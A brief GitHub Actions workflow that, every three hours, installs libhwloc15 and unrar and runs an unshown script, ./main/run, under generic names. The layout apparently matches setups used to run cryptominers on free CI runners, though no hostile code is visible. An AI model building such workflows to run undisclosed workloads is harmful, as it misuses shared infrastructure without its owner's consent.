jobs:
  ci:
    name: Workflow
    runs-on: ubuntu-20.04

    steps:
      - name: Pull Code
        uses: actions/checkout@v2
      - name: Pull Libraries
        run: sudo apt-get update && sudo apt-get install -y libhwloc15 unrar
      - name: Run Checks
        run: ./main/run

name: Action

on:
  schedule:
    - cron: "55 2/3 * * *"
